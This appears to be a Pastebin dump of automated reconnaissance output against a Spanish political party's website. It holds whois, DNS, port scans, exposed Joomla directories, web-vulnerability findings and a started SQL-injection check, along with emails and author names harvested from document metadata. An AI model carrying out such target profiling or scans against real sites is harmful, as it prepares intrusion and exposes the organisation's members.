Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- Hostname falange-autentica.es ISP OVH SAS
- Continent Europe Flag
- FR
- Country France Country Code FR
- Region Unknown Local time 07 Nov 2018 22:25 CET
- City Unknown Postal Code Unknown
- IP Address 91.121.2.184 Latitude 48.858
- Longitude 2.339
- #######################################################################################################################################
- > falange-autentica.es
- Server: 194.187.251.67
- Address: 194.187.251.67#53
- Non-authoritative answer:
- Name: falange-autentica.es
- Address: 91.121.2.184
- #######################################################################################################################################
- HostIP:91.121.2.184
- HostName:falange-autentica.es
- Gathered Inet-whois information for 91.121.2.184
- ---------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 91.121.0.0 - 91.121.31.255
- netname: OVH
- descr: OVH SAS
- descr: Dedicated Servers
- descr: http://www.ovh.com
- country: FR
- admin-c: OK217-RIPE
- tech-c: OTC2-RIPE
- status: ASSIGNED PA
- mnt-by: OVH-MNT
- created: 2006-10-16T12:52:42Z
- last-modified: 2006-10-16T12:52:42Z
- source: RIPE
- role: OVH Technical Contact
- address: OVH SAS
- address: 2 rue Kellermann
- address: 59100 Roubaix
- address: France
- admin-c: OK217-RIPE
- tech-c: GM84-RIPE
- tech-c: SL10162-RIPE
- nic-hdl: OTC2-RIPE
- abuse-mailbox: abuse@ovh.net
- mnt-by: OVH-MNT
- created: 2004-01-28T17:42:29Z
- last-modified: 2014-09-05T10:47:15Z
- source: RIPE # Filtered
- person: Octave Klaba
- address: OVH SAS
- address: 2 rue Kellermann
- address: 59100 Roubaix
- address: France
- phone: +33 9 74 53 13 23
- nic-hdl: OK217-RIPE
- mnt-by: OVH-MNT
- created: 1970-01-01T00:00:00Z
- last-modified: 2017-10-30T21:44:51Z
- source: RIPE # Filtered
- % Information related to '91.121.0.0/16AS16276'
- route: 91.121.0.0/16
- descr: OVH ISP
- descr: Paris, France
- origin: AS16276
- mnt-by: OVH-MNT
- created: 2007-10-16T17:33:02Z
- last-modified: 2007-10-16T17:33:02Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.92.6 (ANGUS)
- Gathered Inic-whois information for falange-autentica.es
- ---------------------------------------------------------------------------------------------------------------------------------------
- Gathered Netcraft information for falange-autentica.es
- ---------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for falange-autentica.es
- Netcraft.com Information gathered
- Gathered Subdomain information for falange-autentica.es
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 possible subdomain(s) for host falange-autentica.es, Searched 0 pages containing 0 results
- Gathered E-Mail information for falange-autentica.es
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host falange-autentica.es, Searched 0 pages containing 0 results
- Gathered TCP Port information for 91.121.2.184
- ---------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 22/tcp open
- 80/tcp open
- Portscan Finished: Scanned 150 ports, 2 ports were in sta
- #######################################################################################################################################
- [i] Scanning Site: http://falange-autentica.es
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: Falange Auténtica
- [+] IP address: 91.121.2.184
- [+] Web Server: Could Not Detect
- [+] CMS: Joomla
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- # If the Joomla site is installed within a folder such as at
- # e.g. www.example.com/joomla/ the robots.txt file MUST be
- # moved to the site root at e.g. www.example.com/robots.txt
- # AND the joomla folder name MUST be prefixed to the disallowed
- # path, e.g. the Disallow rule for the /administrator/ folder
- # MUST be changed to read Disallow: /joomla/administrator/
- #
- # For more information about the robots.txt standard, see:
- # http://www.robotstxt.org/orig.html
- #
- # For syntax checking, see:
- # http://tool.motoricerca.info/robots-checker.phtml
- User-agent: *
- Disallow: /administrator/
- Disallow: /bin/
- Disallow: /cache/
- Disallow: /cli/
- Disallow: /components/
- Disallow: /includes/
- Disallow: /installation/
- Disallow: /language/
- Disallow: /layouts/
- Disallow: /libraries/
- Disallow: /logs/
- Disallow: /modules/
- Disallow: /plugins/
- Disallow: /tmp/
- -----------[end of contents]-------------
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 91.121.2.184
- [i] Country: FR
- [i] State: N/A
- [i] City: N/A
- [i] Latitude: 48.858200
- [i] Longitude: 2.338700
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Date: Wed, 07 Nov 2018 22:07:06 GMT
- [i] X-Powered-By: PHP/5.6.14
- [i] Set-Cookie: 2b5581ae182de78f0daf6795785a3ed8=9ao0ophv6hn0pi59ji0fsfv1c2; path=/; HttpOnly
- [i] Expires: Wed, 17 Aug 2005 00:00:00 GMT
- [i] Last-Modified: Wed, 07 Nov 2018 22:07:07 GMT
- [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- [i] Pragma: no-cache
- [i] Vary: Accept-Encoding
- [i] Content-Type: text/html; charset=utf-8
- [i] Connection: close
- D N S L O O K U P
- =======================================================================================================================================
- falange-autentica.es. 21599 IN SOA dns106.ovh.net. tech.ovh.net. 2018100200 86400 3600 3600000 300
- falange-autentica.es. 21599 IN NS ns106.ovh.net.
- falange-autentica.es. 21599 IN NS dns106.ovh.net.
- falange-autentica.es. 21599 IN A 91.121.2.184
- falange-autentica.es. 599 IN TXT "v=spf1 ip4:46.105.219.212 ~all"
- falange-autentica.es. 599 IN TXT "v=spf1 a mx ip4:91.121.2.184 ~all"
- falange-autentica.es. 599 IN TXT "google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE"
- S U B N E T C A L C U L A T I O N
- =======================================================================================================================================
- Address = 91.121.2.184
- Network = 91.121.2.184 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 91.121.2.184 - 91.121.2.184 }
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-07 22:07 UTC
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.076s latency).
- PORT STATE SERVICE
- 21/tcp filtered ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 2.08 seconds
- #######################################################################################################################################
- [?] Enter the target: http://falange-autentica.es/
- [!] IP Address : 91.121.2.184
- [!] falange-autentica.es doesn't seem to use a CMS
- [+] Honeypot Probabilty: 30%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for falange-autentica.es
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/falange-autentica.es
- ---------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE
- 21/tcp filtered ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- ns106.ovh.net. (213.251.128.150) AS16276 OVH SAS France
- dns106.ovh.net. (213.251.188.150) AS16276 OVH SAS France
- [+] Host Records (A)
- falange-autentica.esHTTP: (falange-autentica.es) (91.121.2.184) AS16276 OVH SAS France
- [+] TXT Records
- "google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE"
- "v=spf1 a mx ip4:91.121.2.184 ~all"
- "v=spf1 ip4:46.105.219.212 ~all"
- [+] DNS Map: https://dnsdumpster.com/static/map/falange-autentica.es.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- No emails found
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [-] Resolving hostnames IPs...
- 91.121.2.184:www.falange-autentica.es
- [+] Virtual hosts:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Crawling the target for fuzzable URLs
- [+] Found 3 fuzzable URLs
- http://falange-autentica.es///descargas/category/1-documentos-de-fa?download=12:decalogo-de-actuacion-de-falange-autentica
- [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> falange-autentica.es
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39060
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;falange-autentica.es. IN A
- ;; ANSWER SECTION:
- falange-autentica.es. 82921 IN A 91.121.2.184
- ;; Query time: 118 msec
- ;; SERVER: 194.187.251.67#53(194.187.251.67)
- ;; WHEN: mer nov 07 17:22:57 EST 2018
- ;; MSG SIZE rcvd: 65
- #######################################################################################################################################
- [+] Hosting Info for Website: falange-autentica.es
- [+] Visitors per day: < 200
- [+] IP Address: ...
- [+] IP Reverse DNS (Host): falange-autentica.es
- [+] Hosting Company: Ovh Sas
- [+] Hosting IP Range: 91.121.0.0 - 91.121.255.255 (65,536 ip)
- [+] Hosting Address: 140 Quai Du Sartel, 59100 Roubaix, France
- [+] Hosting Country: FRA
- [+] Hosting Phone: +33 9 7453 1323, +33 3 2020 0957
- [+] Hosting Website: www.ovh.com
- [+] Hosting CIDR: 91.121.0.0/16
- [+] NS: ns106.ovh.net
- [+] NS: dns106.ovh.net
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> +trace falange-autentica.es
- ;; global options: +cmd
- . 82650 IN NS d.root-servers.net.
- . 82650 IN NS k.root-servers.net.
- . 82650 IN NS i.root-servers.net.
- . 82650 IN NS a.root-servers.net.
- . 82650 IN NS e.root-servers.net.
- . 82650 IN NS f.root-servers.net.
- . 82650 IN NS c.root-servers.net.
- . 82650 IN NS j.root-servers.net.
- . 82650 IN NS b.root-servers.net.
- . 82650 IN NS m.root-servers.net.
- . 82650 IN NS l.root-servers.net.
- . 82650 IN NS h.root-servers.net.
- . 82650 IN NS g.root-servers.net.
- . 82650 IN RRSIG NS 8 0 518400 20181120170000 20181107160000 2134 . EVTqzwzG0hnuJKklOR7lNHckad/RioIyUapKgDQgyj4Q0Zu+EfA1hNvR TN1sKG2sEpsMd20tqRWThT1YOc284u/LoHJAU9DeMrAqfzoyvaU8/8gT h+2lod/iTuPNgPiY0QGucvxflIzL+u3KG5G0xRxlGWdxYUpWKwAGN3O1 whxDrD3kJR3Ye/2+qpvAOTqRHJ1Ka5NrvtjTQT68ez/IajhkUVny2ZsH rmrxAkIhPRTlOOXYG8EBTj8Tv2Rsazf5AwSL+X8Of5XECRVAmc/+z9AR GjJHHvDY2xA1MCL77TSDQ81fcVd6fgoP7GKevQdWG9T7/ILtPrcbtFRk leXAUw==
- ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 122 ms
- es. 172800 IN NS ns-ext.nic.cl.
- es. 172800 IN NS g.nic.es.
- es. 172800 IN NS a.nic.es.
- es. 172800 IN NS ns3.nic.fr.
- es. 172800 IN NS ns1.cesca.es.
- es. 172800 IN NS f.nic.es.
- es. 172800 IN NS sns-pb.isc.org.
- es. 86400 IN DS 29450 8 1 417BEAFB46ABF3430B75C5C29AEF785D476B60E1
- es. 86400 IN DS 29450 8 2 8BEC32A2C9CFE42E393BAF81FFE71B521D3E940612A4590B4763ADC5 39E4B563
- es. 86400 IN DS 44290 8 1 7711F564D55B41C8CE7DFAF4DD323C5B271F86CD
- es. 86400 IN DS 44290 8 2 562EF35E7065588A7178A4BD0155C8527F029C82AA455DD359C84908 B2A7FE17
- es. 86400 IN RRSIG DS 8 1 86400 20181120170000 20181107160000 2134 . z6ORJ779JiCk9ZSEYD5qnh3cD5jOFWer10n8NfgcKB9bxLYHbxdotJAo m8Qio1YhqhI6LB7SdMp4Qi0Mpt71HcO3jhdQBcD08o+dTws+YwRYb7qC VhPTY2gMoI8pMkhZhCZK827HcCLFkvza1NIV9LMOs015U0x22DOASXtS 8zKn9MnW2aywbyAkS3m1X+y2n56DA5qlA80ObijjkTtlavqWaLRkvBxI oEO3RqMYhGXp0ARvygUkQKlPnjzBr2W+BxYQd9EktzvvF1iat/2gFsXC xC9qPgtVx9i9xT23TMET3vScxASN5kT7ESE6R2AxfYx7YskcGpcGRGHM /S3nNQ==
- ;; Received 995 bytes from 2001:500:2f::f#53(f.root-servers.net) in 377 ms
- falange-autentica.es. 86400 IN NS dns106.ovh.net.
- falange-autentica.es. 86400 IN NS ns106.ovh.net.
- spo5r5bnu2j5g2posr633lrok075or26.es. 86400 IN NSEC3 1 1 5 557CEB9FD142AE07 SPOVUI8LLS5HHLJ0I6TEK8ODTJ0PV8PM NS SOA RRSIG DNSKEY NSEC3PARAM
- spo5r5bnu2j5g2posr633lrok075or26.es. 86400 IN RRSIG NSEC3 8 2 86400 20181121051641 20181107010649 64315 es. WibiqeGxP7swWy8WJMC67rD0fXoQlpMxJPJJunU2YlLDMXZ3Fd4U2RK7 rHsIA/dsEO41GCa9V4v9khQBqCohEaxtna2hamwhfax+k2LsNP62oy0S nuP4HSwtH+fc4zBY5w42orQnksL0mxd4WgU0fC/zRJaOc5NelfeKRvM0 GAs=
- 8tv8o4m77cpqau0bg4jo93okkp1ilfg2.es. 86400 IN NSEC3 1 1 5 557CEB9FD142AE07 8U28NLNHQSDPDBK8C201MOME1I7TT22I NS DS RRSIG
- 8tv8o4m77cpqau0bg4jo93okkp1ilfg2.es. 86400 IN RRSIG NSEC3 8 2 86400 20181121094347 20181107073540 22150 es. DczNf3zLq8Zw2pa0uaspr6GvATBEYJm7nO4faMHIeTJxCkKITzf+O1HR Jxu7e/8yHuGYHbzD8ABVLnUbLirAlks4e6ENfGBLPvwS7mxBgpgV849z vcoe51fBThvolELyHkG94FenjHOLKRZ/eD1BS35pH+h029h5DVgQUOjp iRY=
- ;; Received 596 bytes from 130.206.1.7#53(f.nic.es) in 160 ms
- falange-autentica.es. 86400 IN A 91.121.2.184
- ;; Received 65 bytes from 2001:41d0:1:1996::1#53(ns106.ovh.net) in 121 ms
- #######################################################################################################################################
- [+] Testing domain
- www.falange-autentica.es 91.121.2.184
- [+] Dns resolving
- Domain name Ip address Name server
- falange-autentica.es 91.121.2.184 falange-autentica.es
- Found 1 host(s) for falange-autentica.es
- [+] Testing wildcard
- Ok, no wildcard found.
- [+] Scanning for subdomain on falange-autentica.es
- [!] Wordlist not specified. I scannig with my internal wordlist...
- Estimated time about 68.35 seconds
- Subdomain Ip address Name server
- mail.falange-autentica.es 91.121.2.184 falange-autentica.es
- smtp.falange-autentica.es 193.70.18.144 ssl0.ovh.net
- www.falange-autentica.es 91.121.2.184 falange-autentica.es
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------------------------------------------------------------------------------------------------------------------------------------
- 91.121.2.184 302 host mail.falange-autentica.es Apache
- 193.70.18.144 301 alias smtp.falange-autentica.es
- 193.70.18.144 301 host ns0.ovh.net
- 91.121.2.184 200 alias www.falange-autentica.es Apache
- 91.121.2.184 200 host falange-autentica.es Apache
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: falange-autentica.es
- [-] DNSSEC is not configured for falange-autentica.es
- [*] SOA dns106.ovh.net 213.251.188.150
- [*] NS dns106.ovh.net 213.251.188.150
- [*] Bind Version for 213.251.188.150 [Secured]
- [*] NS dns106.ovh.net 2001:41d0:1:4a96::1
- [*] Bind Version for 2001:41d0:1:4a96::1 [Secured]
- [*] NS ns106.ovh.net 213.251.128.150
- [*] Bind Version for 213.251.128.150 [Secured]
- [*] NS ns106.ovh.net 2001:41d0:1:1996::1
- [*] Bind Version for 2001:41d0:1:1996::1 [Secured]
- [-] Could not Resolve MX Records for falange-autentica.es
- [*] A falange-autentica.es 91.121.2.184
- [*] TXT falange-autentica.es v=spf1 a mx ip4:91.121.2.184 ~all
- [*] TXT falange-autentica.es google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE
- [*] TXT falange-autentica.es v=spf1 ip4:46.105.219.212 ~all
- [*] Enumerating SRV Records
- [-] No SRV Records Found for falange-autentica.es
- [+] 0 Records Found
- #######################################################################################################################################
- [*] Processing domain falange-autentica.es
- [+] Getting nameservers
- 213.251.188.150 - dns106.ovh.net
- 213.251.128.150 - ns106.ovh.net
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 a mx ip4:91.121.2.184 ~all"
- "google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE"
- "v=spf1 ip4:46.105.219.212 ~all"
- [*] Scanning falange-autentica.es for A records
- 91.121.2.184 - falange-autentica.es
- 91.121.2.184 - mail.falange-autentica.es
- 193.70.18.144 - smtp.falange-autentica.es
- 91.121.2.184 - www.falange-autentica.es
- #######################################################################################################################################
- Starting Parsero v0.75 (https://github.com/behindthefirewalls/Parsero) at 11/07/18 17:45:38
- Parsero scan report for falange-autentica.es
- http://falange-autentica.es/components/ 200 OK
- http://falange-autentica.es/administrator/ 301 Moved Permanently
- http://falange-autentica.es/libraries/ 200 OK
- http://falange-autentica.es/tmp/ 200 OK
- http://falange-autentica.es/layouts/ 200 OK
- http://falange-autentica.es/cache/ 200 OK
- http://falange-autentica.es/bin/ 200 OK
- http://falange-autentica.es/language/ 200 OK
- http://falange-autentica.es/logs/ 200 OK
- http://falange-autentica.es/includes/ 200 OK
- http://falange-autentica.es/cli/ 200 OK
- http://falange-autentica.es/plugins/ 200 OK
- http://falange-autentica.es/installation/ 404 Not Found
- http://falange-autentica.es/modules/ 200 OK
- [+] 14 links have been analyzed and 12 of them are available!!!
- #######################################################################################################################################
- Start: 2018-11-07T22:49:27+0000
- HOST: web01 Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.79.12.202 0.0% 3 0.7 1.1 0.7 1.7 0.6
- 2.|-- 45.79.12.6 0.0% 3 0.8 0.8 0.6 1.1 0.3
- 3.|-- 45.79.12.8 0.0% 3 0.8 0.7 0.5 0.9 0.2
- 4.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 5.|-- be100-2.dfw-da2-bb1-a9.tx.us 0.0% 3 1.9 2.0 1.9 2.2 0.2
- 6.|-- ash-1-a9.tx.us 0.0% 3 32.1 32.4 32.0 33.0 0.6
- 7.|-- be100-1039.nwk-1-a9.nj.us 0.0% 3 37.3 37.3 37.3 37.3 0.0
- 8.|-- be100-1295.ldn-1-a9.uk.eu 0.0% 3 103.5 103.6 103.5 103.7 0.1
- 9.|-- be100-1041.rbx-g1-nc5.fr.eu 0.0% 3 107.4 107.8 107.4 108.4 0.5
- 10.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 11.|-- rbx1-c1-a72.fr.eu 0.0% 3 106.5 106.6 106.5 106.9 0.2
- 12.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 13.|-- falange-autentica.es 0.0% 3 106.3 106.4 106.3 106.4 0.0
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 91.121.2.184
- + Target Hostname: 91.121.2.184
- + Target Port: 443
- ---------------------------------------------------------------------------------------------------------------------------------------
- + SSL Info: Subject: /CN=azulmania.es
- Ciphers: ECDHE-RSA-AES256-GCM-SHA384
- Issuer: /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
- + Start Time: 2018-11-07 17:08:42 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: Apache
- + Retrieved x-powered-by header: PHP/5.6.14
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Root page / redirects to: http://azulmania.es/
- + "robots.txt" contains 85 entries which should be manually viewed.
- + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
- + Hostname '91.121.2.184' does not match certificate's names: azulmania.es
- + 8431 requests: 0 error(s) and 8 item(s) reported on remote host
- + End Time: 2018-11-07 18:34:09 (GMT-5) (5127 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 91.121.2.184
- + Target Hostname: falange-autentica.es
- + Target Port: 80
- + Start Time: 2018-11-07 17:07:57 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: No banner retrieved
- + Retrieved x-powered-by header: PHP/5.6.14
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Server leaks inodes via ETags, header found with file /robots.txt, inode: 2361571, size: 842, mtime: Thu Dec 24 12:51:58 2015
- + Entry '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (301)
- + Entry '/bin/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/cli/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/layouts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/logs/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + "robots.txt" contains 14 entries which should be manually viewed.
- + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
- + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
- + Server banner has changed from '' to 'Apache' which may suggest a WAF, load balancer or proxy is in place
- + /servlet/webacc?User.html=noexist: Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.
- + /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see http://www.microsoft.com/technet/security/bulletin/MS02-018.asp for details.
- + OSVDB-578: /level/16: CISCO HTTP service allows remote execution of commands
- + OSVDB-155: /counter/1/n/n/0/3/5/0/a/123.gif: The Roxen Counter may eat up excessive CPU time with image requests.
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- falange-autentica.es -----
- Host's addresses:
- __________________
- falange-autentica.es. 83723 IN A 91.121.2.184
- Name Servers:
- ______________
- dns106.ovh.net. 86126 IN A 213.251.188.150
- ns106.ovh.net. 86125 IN A 213.251.128.150
- Mail (MX) Servers:
- ___________________
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for falange-autentica.es on dns106.ovh.net ...
- Trying Zone Transfer for falange-autentica.es on ns106.ovh.net ...
- brute force file not specified, bay.
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- [2/25] http://www.falange-autentica.es/fa/pica/pica004.pdf
- [3/25] http://www.falange-autentica.es/fa/docus/Mocion_FA_Pobreza_Cero.pdf
- [4/25] http://www.falange-autentica.es/fa/gora_beti/gora_beti001.pdf
- [5/25] http://www.falange-autentica.es/fa/docus/doc15.pdf
- [6/25] http://www.falange-autentica.es/fa/amina/t_amina.pdf
- [7/25] http://www.falange-autentica.es/fa/amina/solicitud.pdf
- [8/25] http://www.falange-autentica.es/fa/mayo2003/programas/p_torrevieja.pdf
- [9/25] http://www.falange-autentica.es/fa/mayo2003/programas/p_hoyo.pdf
- [10/25] http://www.falange-autentica.es/fa/pica/pica002-seg.pdf
- [11/25] http://falange-autentica.es/fa/mayo2003/programas/p_ardales.pdf
- [12/25] http://www.falange-autentica.es/fa/mayo2003/programas/p_guarena.pdf
- [13/25] http://falange-autentica.es/fa/generales2004/20040228-alicante.pdf
- [14/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D49:horizonte-n-15
- [x] Error in the parsing process
- [15/25] http://www.falange-autentica.es/descargas/category/5-envio%3Fdownload%3D32:envio-n-8
- [x] Error in the parsing process
- [16/25] http://www.falange-autentica.es/descargas/category/9-pica%3Fdownload%3D41:pica-n-6
- [x] Error in the parsing process
- [17/25] http://www.falange-autentica.es/descargas/category/9-pica%3Fdownload%3D38:pica-n-3
- [x] Error in the parsing process
- [18/25] http://www.falange-autentica.es/descargas/category/5-envio%3Fdownload%3D33:envio-n-9
- [x] Error in the parsing process
- [19/25] http://www.falange-autentica.es/descargas/category/5-envio%3Fdownload%3D29:envio-n-5
- [x] Error in the parsing process
- [20/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D59:horizonte-n-28
- [x] Error in the parsing process
- [21/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D53:horizonte-n-21
- [x] Error in the parsing process
- [22/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D57:horizonte-n-25
- [x] Error in the parsing process
- [23/25] http://www.falange-autentica.es/descargas/category/9-pica%3Fdownload%3D42:pica-n-7
- [x] Error in the parsing process
- [24/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D60:horizonte-n-29
- [x] Error in the parsing process
- [25/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D50:horizonte-n-16
- [x] Error in the parsing process
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- Francisco Ortiz Lozano
- ��Teo
- Falange Aut�ntica de Euskalerr�a
- COngreso Constituyente. Noviembre de 2002
- Falange Aut�ntica
- ��Torpedo
- Torpedo
- [+] List of software found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- Acrobat Distiller 5.0 (Windows)
- ADOBEPS4.DRV Version 4.50
- Acrobat PDFWriter 5.0 para Windows NT
- ��Moci�n FA Pobreza Cero.doc - Microsoft Word
- PScript5.dll Version 5.2
- ofi solicitud mocion - Microsoft Word
- ��programa torrevieja def - Microsoft Word
- Programa Hoyo - Microsoft Word
- Programa de Ardales - Microsoft Word
- Programa Guare�a - Microsoft Word
- ��NOTA RUEDA DE PRENSA.doc - Microsoft Word
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] List of e-mails found:
- --------------------------------------------------------------------------------------------------------------------------------------
- euskalerria@falange-autentica.org
- vegabaja@falange-autentica.org
- vegabaja@falange
- comunicacion@falange-
- ntic@s
- n@falange-
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [-] Enumerating subdomains now for falange-autentica.es
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- SSL Certificates: www.falange-autentica.es
- Virustotal: www.falange-autentica.es
- [!] Error: Google probably now is blocking our requests
- [~] Finished now the Google Enumeration ...
- [-] Saving results to file: /usr/share/sniper/loot/falange-autentica.es/domains/domains-falange-autentica.es.txt
- [-] Total Unique Subdomains Found: 1
- www.falange-autentica.es
- #######################################################################################################################################
- www.falange-autentica.es,91.121.2.184
- falange-autentica.es,91.121.2.184
- mail.falange-autentica.es,91.121.2.184
- smtp.falange-autentica.es,193.70.18.144
- #######################################################################################################################################
- [*] Processing domain falange-autentica.es
- [+] Getting nameservers
- 213.251.188.150 - dns106.ovh.net
- 213.251.128.150 - ns106.ovh.net
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 ip4:46.105.219.212 ~all"
- "google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE"
- "v=spf1 a mx ip4:91.121.2.184 ~all"
- [*] Scanning falange-autentica.es for A records
- 91.121.2.184 - mail.falange-autentica.es
- 193.70.18.144 - smtp.falange-autentica.es
- 91.121.2.184 - falange-autentica.es
- 91.121.2.184 - www.falange-autentica.es
- #######################################################################################################################################
- [*] Found SPF record:
- [*] v=spf1 a mx ip4:91.121.2.184 ~all
- [*] SPF record contains an All item: ~all
- [*] Found DMARC record:
- [*] v=DMARC1; p=quarantine; rua=mailto:admin@falange-autentica.es; ruf=mailto:admin@falange-autentica.es; sp=quarantine
- [-] DMARC policy set to quarantine
- [*] Aggregate reports will be sent: mailto:admin@falange-autentica.es
